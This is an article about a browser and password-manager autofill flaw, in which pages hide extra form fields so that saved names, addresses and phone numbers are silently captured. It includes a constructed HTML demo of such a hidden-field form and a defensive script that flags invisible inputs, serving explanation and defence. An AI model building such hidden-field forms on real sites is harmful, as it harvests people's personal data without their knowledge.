People are increasingly relying on browser autofill and password managers to ease the business of moving between websites and juggling multiple usernames and passwords. Using a password manager is generally a sound way to stay safe online, but a newly reported flaw in several well known browsers and password managers may leave users at risk from scammers.
The flaw concerns autofill directly: the feature that pastes saved personal information into web forms so that users need not type it afresh on every occasion. It is present in browsers such as Google Chrome and Apple Safari, and in browser add-ons such as the LastPass password manager used on those browsers.
Once a user starts entering their details into a website, autofill is triggered and suggests what each of the remaining boxes should contain. If the user accepts by clicking one of the suggestions, the function fills out the remaining boxes in one go.
Security researcher Viljami Kuosmanen has demonstrated that autofill also inserts information into text boxes that the page has hidden from view, which lets scammers harvest it without the user's knowledge. Such hidden boxes can capture details including name, other personally identifying information, email address, postal address and phone number.
Credit card details may be exposed in the same way, although it remains common practice for browsers to ask the user for confirmation before filling those in.
To show how such a scam could work, Kuosmanen built a demonstration website that visibly asks only for a name and email address, but contains hidden boxes that get autofilled with details such as organisation, address and phone number.
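The page below is an added, constructed illustration of the kind of demonstration site described above; it is not Kuosmanen's own page, and the form id, class names and field names are my own choices. Two name-and-email fields are visible, while three more fields sit off-screen with autocomplete hints that a form-filler recognises. The submit handler stands in for the attacker's server and simply lists every field the browser would send, hidden ones included. The script also defines a small check, findHiddenAutofillFields(), that lists text-like inputs the user cannot see; it can be pasted into the browser's developer console on any page before accepting an autofill suggestion. Whether a given browser version still fills off-screen fields is something to verify in that browser, not something this page settles.

```html
<!doctype html>
<meta charset="utf-8">
<title>Autofill hidden-field demo (constructed example, not the researcher's page)</title>
<style>
  /* Fields the user sees */
  .visible   { display: block; margin: .5em 0; }
  /* Fields the user never sees, but which a form-filler may still treat as part of the form */
  .offscreen { position: absolute; left: -9999px; top: -9999px; }
</style>

<form id="signup">
  <label class="visible">Name  <input name="name"  autocomplete="name"></label>
  <label class="visible">Email <input name="email" autocomplete="email"></label>

  <!-- Positioned far outside the viewport: a user who accepts an autofill
       suggestion for "Name" never sees these being populated. -->
  <div class="offscreen">
    <input name="organization"   autocomplete="organization">
    <input name="street-address" autocomplete="street-address">
    <input name="phone"          autocomplete="tel">
  </div>

  <button>Sign up</button>
</form>
<pre id="out"></pre>

<script>
  // Stand-in for the attacker's server: show everything the form would submit,
  // including whatever the browser put into the off-screen fields.
  document.getElementById('signup').addEventListener('submit', (ev) => {
    ev.preventDefault();
    const lines = [];
    for (const [field, value] of new FormData(ev.target)) {
      lines.push(`${field} = ${JSON.stringify(value)}`);
    }
    document.getElementById('out').textContent = lines.join('\n');
  });

  // Defensive check: list text-like inputs that are not visible to the user.
  // Browsers infer a field's purpose from its name and label as well as from
  // the autocomplete attribute, so every hidden text-like input is reported,
  // not only those carrying an autocomplete hint.
  function findHiddenAutofillFields(root = document) {
    const skip = new Set(['hidden', 'submit', 'button', 'checkbox', 'radio',
                          'file', 'image', 'reset']);
    const docW = document.documentElement.scrollWidth;
    const docH = document.documentElement.scrollHeight;
    const suspects = [];
    for (const el of root.querySelectorAll('input, select, textarea')) {
      if (el instanceof HTMLInputElement && skip.has(el.type)) continue;
      const cs = getComputedStyle(el);
      const r  = el.getBoundingClientRect();
      const invisible = cs.display === 'none' || cs.visibility === 'hidden' ||
                        parseFloat(cs.opacity) === 0 || r.width === 0 || r.height === 0;
      // Convert viewport coordinates to document coordinates so that fields merely
      // below the fold are not flagged, while fields placed outside the document are.
      const left = r.left + scrollX, top = r.top + scrollY;
      const offscreen = left + r.width <= 0 || top + r.height <= 0 ||
                        left >= docW || top >= docH;
      if (invisible || offscreen) {
        suspects.push({
          name: el.name || '(unnamed)',
          autocomplete: el.getAttribute('autocomplete') || '(none)',
          reason: invisible ? 'invisible' : 'off-screen',
        });
      }
    }
    return suspects;
  }

  // On this demo page the three off-screen inputs are reported.
  console.table(findHiddenAutofillFields());
</script>
```

Open the file in a browser that has an address profile saved, accept the autofill suggestion on the Name field, and press Sign up: the listing under the form shows whether organisation, street address and phone number were filled in alongside the two visible fields.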
The attack only works when the user selects one of the autofill suggestions, so until a fix has been released the simplest protection is not to click on the suggestions that pop up in a form field. Autofill can also be switched off entirely in the browser settings: in Chrome, go to Settings > Advanced and untick the option labelled "Enable Autofill to fill out web forms in a single click".
Mozilla's Firefox is not affected by the flaw, because Firefox fills each field one at a time rather than completing the whole form at once.
Photo credit: Christiaan Colen